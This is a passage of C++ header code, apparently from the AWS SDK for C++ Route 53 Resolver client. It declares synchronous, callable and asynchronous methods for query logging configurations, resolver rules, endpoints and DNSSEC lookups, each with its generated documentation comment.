<p>To remove a VPC from a query * logging configuration, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverQueryLogConfig">AWS * API Reference</a></p> */ virtual Model::AssociateResolverQueryLogConfigOutcome AssociateResolverQueryLogConfig(const Model::AssociateResolverQueryLogConfigRequest& request) const; /** * <p>Associates an Amazon VPC with a specified query logging configuration. Route * 53 Resolver logs DNS queries that originate in all of the Amazon VPCs that are * associated with a specified query logging configuration. To associate more than * one VPC with a configuration, submit one * <code>AssociateResolverQueryLogConfig</code> request for each VPC.</p> * <p>The VPCs that you associate with a query logging configuration must be in the * same Region as the configuration.</p> <p>To remove a VPC from a query * logging configuration, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverQueryLogConfig">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::AssociateResolverQueryLogConfigOutcomeCallable AssociateResolverQueryLogConfigCallable(const Model::AssociateResolverQueryLogConfigRequest& request) const; /** * <p>Associates an Amazon VPC with a specified query logging configuration. Route * 53 Resolver logs DNS queries that originate in all of the Amazon VPCs that are * associated with a specified query logging configuration. To associate more than * one VPC with a configuration, submit one * <code>AssociateResolverQueryLogConfig</code> request for each VPC.</p> * <p>The VPCs that you associate with a query logging configuration must be in the * same Region as the configuration.</p> <p>To remove a VPC from a query * logging configuration, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverQueryLogConfig">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void AssociateResolverQueryLogConfigAsync(const Model::AssociateResolverQueryLogConfigRequest& request, const AssociateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Associates a Resolver rule with a VPC. When you associate a rule with a VPC, * Resolver forwards all DNS queries for the domain name that is specified in the * rule and that originate in the VPC. The queries are forwarded to the IP * addresses for the DNS resolvers that are specified in the rule. For more * information about rules, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_CreateResolverRule.html">CreateResolverRule</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverRule">AWS * API Reference</a></p> */ virtual Model::AssociateResolverRuleOutcome AssociateResolverRule(const Model::AssociateResolverRuleRequest& request) const; /** * <p>Associates a Resolver rule with a VPC. When you associate a rule with a VPC, * Resolver forwards all DNS queries for the domain name that is specified in the * rule and that originate in the VPC. The queries are forwarded to the IP * addresses for the DNS resolvers that are specified in the rule. For more * information about rules, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_CreateResolverRule.html">CreateResolverRule</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverRule">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::AssociateResolverRuleOutcomeCallable AssociateResolverRuleCallable(const Model::AssociateResolverRuleRequest& request) const; /** * <p>Associates a Resolver rule with a VPC. When you associate a rule with a VPC, * Resolver forwards all DNS queries for the domain name that is specified in the * rule and that originate in the VPC. The queries are forwarded to the IP * addresses for the DNS resolvers that are specified in the rule. For more * information about rules, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_CreateResolverRule.html">CreateResolverRule</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/AssociateResolverRule">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void AssociateResolverRuleAsync(const Model::AssociateResolverRuleRequest& request, const AssociateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Creates a Resolver endpoint. There are two types of Resolver endpoints, * inbound and outbound:</p> <ul> <li> <p>An <i>inbound Resolver endpoint</i> * forwards DNS queries to the DNS service for a VPC from your network.</p> </li> * <li> <p>An <i>outbound Resolver endpoint</i> forwards DNS queries from the DNS * service for a VPC to your network.</p> </li> </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverEndpoint">AWS * API Reference</a></p> */ virtual Model::CreateResolverEndpointOutcome CreateResolverEndpoint(const Model::CreateResolverEndpointRequest& request) const; /** * <p>Creates a Resolver endpoint. There are two types of Resolver endpoints, * inbound and outbound:</p> <ul> <li> <p>An <i>inbound Resolver endpoint</i> * forwards DNS queries to the DNS service for a VPC from your network.</p> </li> * <li> <p>An <i>outbound Resolver endpoint</i> forwards DNS queries from the DNS * service for a VPC to your network.</p> </li> </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverEndpoint">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::CreateResolverEndpointOutcomeCallable CreateResolverEndpointCallable(const Model::CreateResolverEndpointRequest& request) const; /** * <p>Creates a Resolver endpoint. There are two types of Resolver endpoints, * inbound and outbound:</p> <ul> <li> <p>An <i>inbound Resolver endpoint</i> * forwards DNS queries to the DNS service for a VPC from your network.</p> </li> * <li> <p>An <i>outbound Resolver endpoint</i> forwards DNS queries from the DNS * service for a VPC to your network.</p> </li> </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverEndpoint">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void CreateResolverEndpointAsync(const Model::CreateResolverEndpointRequest& request, const CreateResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Creates a Resolver query logging configuration, which defines where you want * Resolver to save DNS query logs that originate in your VPCs. Resolver can log * queries only for VPCs that are in the same Region as the query logging * configuration.</p> <p>To specify which VPCs you want to log queries for, you use * <code>AssociateResolverQueryLogConfig</code>. For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverQueryLogConfig.html">AssociateResolverQueryLogConfig</a>. * </p> <p>You can optionally use AWS Resource Access Manager (AWS RAM) to share a * query logging configuration with other AWS accounts. The other accounts can then * associate VPCs with the configuration. The query logs that Resolver creates for * a configuration include all DNS queries that originate in all VPCs that are * associated with the configuration.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverQueryLogConfig">AWS * API Reference</a></p> */ virtual Model::CreateResolverQueryLogConfigOutcome CreateResolverQueryLogConfig(const Model::CreateResolverQueryLogConfigRequest& request) const; /** * <p>Creates a Resolver query logging configuration, which defines where you want * Resolver to save DNS query logs that originate in your VPCs. Resolver can log * queries only for VPCs that are in the same Region as the query logging * configuration.</p> <p>To specify which VPCs you want to log queries for, you use * <code>AssociateResolverQueryLogConfig</code>. For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverQueryLogConfig.html">AssociateResolverQueryLogConfig</a>. * </p> <p>You can optionally use AWS Resource Access Manager (AWS RAM) to share a * query logging configuration with other AWS accounts. The other accounts can then * associate VPCs with the configuration. The query logs that Resolver creates for * a configuration include all DNS queries that originate in all VPCs that are * associated with the configuration.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverQueryLogConfig">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::CreateResolverQueryLogConfigOutcomeCallable CreateResolverQueryLogConfigCallable(const Model::CreateResolverQueryLogConfigRequest& request) const; /** * <p>Creates a Resolver query logging configuration, which defines where you want * Resolver to save DNS query logs that originate in your VPCs. Resolver can log * queries only for VPCs that are in the same Region as the query logging * configuration.</p> <p>To specify which VPCs you want to log queries for, you use * <code>AssociateResolverQueryLogConfig</code>. For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverQueryLogConfig.html">AssociateResolverQueryLogConfig</a>. * </p> <p>You can optionally use AWS Resource Access Manager (AWS RAM) to share a * query logging configuration with other AWS accounts. The other accounts can then * associate VPCs with the configuration. The query logs that Resolver creates for * a configuration include all DNS queries that originate in all VPCs that are * associated with the configuration.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverQueryLogConfig">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void CreateResolverQueryLogConfigAsync(const Model::CreateResolverQueryLogConfigRequest& request, const CreateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>For DNS queries that originate in your VPCs, specifies which Resolver * endpoint the queries pass through, one domain name that you want to forward to * your network, and the IP addresses of the DNS resolvers in your * network.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverRule">AWS * API Reference</a></p> */ virtual Model::CreateResolverRuleOutcome CreateResolverRule(const Model::CreateResolverRuleRequest& request) const; /** * <p>For DNS queries that originate in your VPCs, specifies which Resolver * endpoint the queries pass through, one domain name that you want to forward to * your network, and the IP addresses of the DNS resolvers in your * network.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverRule">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::CreateResolverRuleOutcomeCallable CreateResolverRuleCallable(const Model::CreateResolverRuleRequest& request) const; /** * <p>For DNS queries that originate in your VPCs, specifies which Resolver * endpoint the queries pass through, one domain name that you want to forward to * your network, and the IP addresses of the DNS resolvers in your * network.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/CreateResolverRule">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void CreateResolverRuleAsync(const Model::CreateResolverRuleRequest& request, const CreateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Deletes a Resolver endpoint. The effect of deleting a Resolver endpoint * depends on whether it's an inbound or an outbound Resolver endpoint:</p> <ul> * <li> <p> <b>Inbound</b>: DNS queries from your network are no longer routed to * the DNS service for the specified VPC.</p> </li> <li> <p> <b>Outbound</b>: DNS * queries from a VPC are no longer routed to your network.</p> </li> * </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverEndpoint">AWS * API Reference</a></p> */ virtual Model::DeleteResolverEndpointOutcome DeleteResolverEndpoint(const Model::DeleteResolverEndpointRequest& request) const; /** * <p>Deletes a Resolver endpoint. The effect of deleting a Resolver endpoint * depends on whether it's an inbound or an outbound Resolver endpoint:</p> <ul> * <li> <p> <b>Inbound</b>: DNS queries from your network are no longer routed to * the DNS service for the specified VPC.</p> </li> <li> <p> <b>Outbound</b>: DNS * queries from a VPC are no longer routed to your network.</p> </li> * </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverEndpoint">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::DeleteResolverEndpointOutcomeCallable DeleteResolverEndpointCallable(const Model::DeleteResolverEndpointRequest& request) const; /** * <p>Deletes a Resolver endpoint. The effect of deleting a Resolver endpoint * depends on whether it's an inbound or an outbound Resolver endpoint:</p> <ul> * <li> <p> <b>Inbound</b>: DNS queries from your network are no longer routed to * the DNS service for the specified VPC.</p> </li> <li> <p> <b>Outbound</b>: DNS * queries from a VPC are no longer routed to your network.</p> </li> * </ul><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverEndpoint">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void DeleteResolverEndpointAsync(const Model::DeleteResolverEndpointRequest& request, const DeleteResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Deletes a query logging configuration. When you delete a configuration, * Resolver stops logging DNS queries for all of the Amazon VPCs that are * associated with the configuration. This also applies if the query logging * configuration is shared with other AWS accounts, and the other accounts have * associated VPCs with the shared configuration.</p> <p>Before you can delete a * query logging configuration, you must first disassociate all VPCs from the * configuration. See <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>.</p> * <p>If you used Resource Access Manager (RAM) to share a query logging * configuration with other accounts, you must stop sharing the configuration * before you can delete a configuration. The accounts that you shared the * configuration with can first disassociate VPCs that they associated with the * configuration, but that's not necessary. If you stop sharing the configuration, * those VPCs are automatically disassociated from the configuration.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverQueryLogConfig">AWS * API Reference</a></p> */ virtual Model::DeleteResolverQueryLogConfigOutcome DeleteResolverQueryLogConfig(const Model::DeleteResolverQueryLogConfigRequest& request) const; /** * <p>Deletes a query logging configuration. When you delete a configuration, * Resolver stops logging DNS queries for all of the Amazon VPCs that are * associated with the configuration. This also applies if the query logging * configuration is shared with other AWS accounts, and the other accounts have * associated VPCs with the shared configuration.</p> <p>Before you can delete a * query logging configuration, you must first disassociate all VPCs from the * configuration. See <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>.</p> * <p>If you used Resource Access Manager (RAM) to share a query logging * configuration with other accounts, you must stop sharing the configuration * before you can delete a configuration. The accounts that you shared the * configuration with can first disassociate VPCs that they associated with the * configuration, but that's not necessary. If you stop sharing the configuration, * those VPCs are automatically disassociated from the configuration.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverQueryLogConfig">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::DeleteResolverQueryLogConfigOutcomeCallable DeleteResolverQueryLogConfigCallable(const Model::DeleteResolverQueryLogConfigRequest& request) const; /** * <p>Deletes a query logging configuration. When you delete a configuration, * Resolver stops logging DNS queries for all of the Amazon VPCs that are * associated with the configuration. This also applies if the query logging * configuration is shared with other AWS accounts, and the other accounts have * associated VPCs with the shared configuration.</p> <p>Before you can delete a * query logging configuration, you must first disassociate all VPCs from the * configuration. See <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverQueryLogConfig.html">DisassociateResolverQueryLogConfig</a>.</p> * <p>If you used Resource Access Manager (RAM) to share a query logging * configuration with other accounts, you must stop sharing the configuration * before you can delete a configuration. The accounts that you shared the * configuration with can first disassociate VPCs that they associated with the * configuration, but that's not necessary. If you stop sharing the configuration, * those VPCs are automatically disassociated from the configuration.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverQueryLogConfig">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void DeleteResolverQueryLogConfigAsync(const Model::DeleteResolverQueryLogConfigRequest& request, const DeleteResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Deletes a Resolver rule. Before you can delete a Resolver rule, you must * disassociate it from all the VPCs that you associated the Resolver rule with. * For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverRule.html">DisassociateResolverRule</a>.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverRule">AWS * API Reference</a></p> */ virtual Model::DeleteResolverRuleOutcome DeleteResolverRule(const Model::DeleteResolverRuleRequest& request) const; /** * <p>Deletes a Resolver rule. Before you can delete a Resolver rule, you must * disassociate it from all the VPCs that you associated the Resolver rule with. * For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverRule.html">DisassociateResolverRule</a>.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverRule">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::DeleteResolverRuleOutcomeCallable DeleteResolverRuleCallable(const Model::DeleteResolverRuleRequest& request) const; /** * <p>Deletes a Resolver rule. Before you can delete a Resolver rule, you must * disassociate it from all the VPCs that you associated the Resolver rule with. * For more information, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_DisassociateResolverRule.html">DisassociateResolverRule</a>.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DeleteResolverRule">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void DeleteResolverRuleAsync(const Model::DeleteResolverRuleRequest& request, const DeleteResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Removes IP addresses from an inbound or an outbound Resolver endpoint. If you * want to remove more than one IP address, submit one * <code>DisassociateResolverEndpointIpAddress</code> request for each IP * address.</p> <p>To add an IP address to an endpoint, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverEndpointIpAddress.html">AssociateResolverEndpointIpAddress</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverEndpointIpAddress">AWS * API Reference</a></p> */ virtual Model::DisassociateResolverEndpointIpAddressOutcome DisassociateResolverEndpointIpAddress(const Model::DisassociateResolverEndpointIpAddressRequest& request) const; /** * <p>Removes IP addresses from an inbound or an outbound Resolver endpoint. If you * want to remove more than one IP address, submit one * <code>DisassociateResolverEndpointIpAddress</code> request for each IP * address.</p> <p>To add an IP address to an endpoint, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverEndpointIpAddress.html">AssociateResolverEndpointIpAddress</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverEndpointIpAddress">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::DisassociateResolverEndpointIpAddressOutcomeCallable DisassociateResolverEndpointIpAddressCallable(const Model::DisassociateResolverEndpointIpAddressRequest& request) const; /** * <p>Removes IP addresses from an inbound or an outbound Resolver endpoint. If you * want to remove more than one IP address, submit one * <code>DisassociateResolverEndpointIpAddress</code> request for each IP * address.</p> <p>To add an IP address to an endpoint, see <a * href="https://docs.aws.amazon.com/Route53/latest/APIReference/API_route53resolver_AssociateResolverEndpointIpAddress.html">AssociateResolverEndpointIpAddress</a>. * </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverEndpointIpAddress">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void DisassociateResolverEndpointIpAddressAsync(const Model::DisassociateResolverEndpointIpAddressRequest& request, const DisassociateResolverEndpointIpAddressResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Disassociates a VPC from a query logging configuration.</p> <p>Before * you can delete a query logging configuration, you must first disassociate all * VPCs from the configuration. If you used Resource Access Manager (RAM) to share * a query logging configuration with other accounts, VPCs can be disassociated * from the configuration in the following ways:</p> <ul> <li> <p>The accounts that * you shared the configuration with can disassociate VPCs from the * configuration.</p> </li> <li> <p>You can stop sharing the configuration.</p> * </li> </ul> <p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverQueryLogConfig">AWS * API Reference</a></p> */ virtual Model::DisassociateResolverQueryLogConfigOutcome DisassociateResolverQueryLogConfig(const Model::DisassociateResolverQueryLogConfigRequest& request) const; /** * <p>Disassociates a VPC from a query logging configuration.</p> <p>Before * you can delete a query logging configuration, you must first disassociate all * VPCs from the configuration. If you used Resource Access Manager (RAM) to share * a query logging configuration with other accounts, VPCs can be disassociated * from the configuration in the following ways:</p> <ul> <li> <p>The accounts that * you shared the configuration with can disassociate VPCs from the * configuration.</p> </li> <li> <p>You can stop sharing the configuration.</p> * </li> </ul> <p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverQueryLogConfig">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::DisassociateResolverQueryLogConfigOutcomeCallable DisassociateResolverQueryLogConfigCallable(const Model::DisassociateResolverQueryLogConfigRequest& request) const; /** * <p>Disassociates a VPC from a query logging configuration.</p> <p>Before * you can delete a query logging configuration, you must first disassociate all * VPCs from the configuration. If you used Resource Access Manager (RAM) to share * a query logging configuration with other accounts, VPCs can be disassociated * from the configuration in the following ways:</p> <ul> <li> <p>The accounts that * you shared the configuration with can disassociate VPCs from the * configuration.</p> </li> <li> <p>You can stop sharing the configuration.</p> * </li> </ul> <p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverQueryLogConfig">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void DisassociateResolverQueryLogConfigAsync(const Model::DisassociateResolverQueryLogConfigRequest& request, const DisassociateResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Removes the association between a specified Resolver rule and a specified * VPC.</p> <p>If you disassociate a Resolver rule from a VPC, Resolver * stops forwarding DNS queries for the domain name that you specified in the * Resolver rule. </p> <p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverRule">AWS * API Reference</a></p> */ virtual Model::DisassociateResolverRuleOutcome DisassociateResolverRule(const Model::DisassociateResolverRuleRequest& request) const; /** * <p>Removes the association between a specified Resolver rule and a specified * VPC.</p> <p>If you disassociate a Resolver rule from a VPC, Resolver * stops forwarding DNS queries for the domain name that you specified in the * Resolver rule. </p> <p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverRule">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::DisassociateResolverRuleOutcomeCallable DisassociateResolverRuleCallable(const Model::DisassociateResolverRuleRequest& request) const; /** * <p>Removes the association between a specified Resolver rule and a specified * VPC.</p> <p>If you disassociate a Resolver rule from a VPC, Resolver * stops forwarding DNS queries for the domain name that you specified in the * Resolver rule. </p> <p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/DisassociateResolverRule">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void DisassociateResolverRuleAsync(const Model::DisassociateResolverRuleRequest& request, const DisassociateResolverRuleResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Gets DNSSEC validation information for a specified resource.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverDnssecConfig">AWS * API Reference</a></p> */ virtual Model::GetResolverDnssecConfigOutcome GetResolverDnssecConfig(const Model::GetResolverDnssecConfigRequest& request) const; /** * <p>Gets DNSSEC validation information for a specified resource.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverDnssecConfig">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::GetResolverDnssecConfigOutcomeCallable GetResolverDnssecConfigCallable(const Model::GetResolverDnssecConfigRequest& request) const; /** * <p>Gets DNSSEC validation information for a specified resource.</p><p><h3>See * Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverDnssecConfig">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void GetResolverDnssecConfigAsync(const Model::GetResolverDnssecConfigRequest& request, const GetResolverDnssecConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Gets information about a specified Resolver endpoint, such as whether it's an * inbound or an outbound Resolver endpoint, and the current status of the * endpoint.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverEndpoint">AWS * API Reference</a></p> */ virtual Model::GetResolverEndpointOutcome GetResolverEndpoint(const Model::GetResolverEndpointRequest& request) const; /** * <p>Gets information about a specified Resolver endpoint, such as whether it's an * inbound or an outbound Resolver endpoint, and the current status of the * endpoint.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverEndpoint">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::GetResolverEndpointOutcomeCallable GetResolverEndpointCallable(const Model::GetResolverEndpointRequest& request) const; /** * <p>Gets information about a specified Resolver endpoint, such as whether it's an * inbound or an outbound Resolver endpoint, and the current status of the * endpoint.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverEndpoint">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void GetResolverEndpointAsync(const Model::GetResolverEndpointRequest& request, const GetResolverEndpointResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Gets information about a specified Resolver query logging configuration, such * as the number of VPCs that the configuration is logging queries for and the * location that logs are sent to. </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfig">AWS * API Reference</a></p> */ virtual Model::GetResolverQueryLogConfigOutcome GetResolverQueryLogConfig(const Model::GetResolverQueryLogConfigRequest& request) const; /** * <p>Gets information about a specified Resolver query logging configuration, such * as the number of VPCs that the configuration is logging queries for and the * location that logs are sent to. </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfig">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::GetResolverQueryLogConfigOutcomeCallable GetResolverQueryLogConfigCallable(const Model::GetResolverQueryLogConfigRequest& request) const; /** * <p>Gets information about a specified Resolver query logging configuration, such * as the number of VPCs that the configuration is logging queries for and the * location that logs are sent to. </p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfig">AWS * API Reference</a></p> * * Queues the request into a thread executor and triggers associated callback when operation has finished. */ virtual void GetResolverQueryLogConfigAsync(const Model::GetResolverQueryLogConfigRequest& request, const GetResolverQueryLogConfigResponseReceivedHandler& handler, const std::shared_ptr<const Aws::Client::AsyncCallerContext>& context = nullptr) const; /** * <p>Gets information about a specified association between a Resolver query * logging configuration and an Amazon VPC. When you associate a VPC with a query * logging configuration, Resolver logs DNS queries that originate in that * VPC.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfigAssociation">AWS * API Reference</a></p> */ virtual Model::GetResolverQueryLogConfigAssociationOutcome GetResolverQueryLogConfigAssociation(const Model::GetResolverQueryLogConfigAssociationRequest& request) const; /** * <p>Gets information about a specified association between a Resolver query * logging configuration and an Amazon VPC. When you associate a VPC with a query * logging configuration, Resolver logs DNS queries that originate in that * VPC.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfigAssociation">AWS * API Reference</a></p> * * returns a future to the operation so that it can be executed in parallel to other requests. */ virtual Model::GetResolverQueryLogConfigAssociationOutcomeCallable GetResolverQueryLogConfigAssociationCallable(const Model::GetResolverQueryLogConfigAssociationRequest& request) const; /** * <p>Gets information about a specified association between a Resolver query * logging configuration and an Amazon VPC. When you associate a VPC with a query * logging configuration, Resolver logs DNS queries that originate in that * VPC.</p><p><h3>See Also:</h3> <a * href="http://docs.aws.amazon.com/goto/WebAPI/route53resolver-2018-04-01/GetResolverQueryLogConfigAssociation">AWS * API Reference</a></p> * * Queues the request into a thread executor and 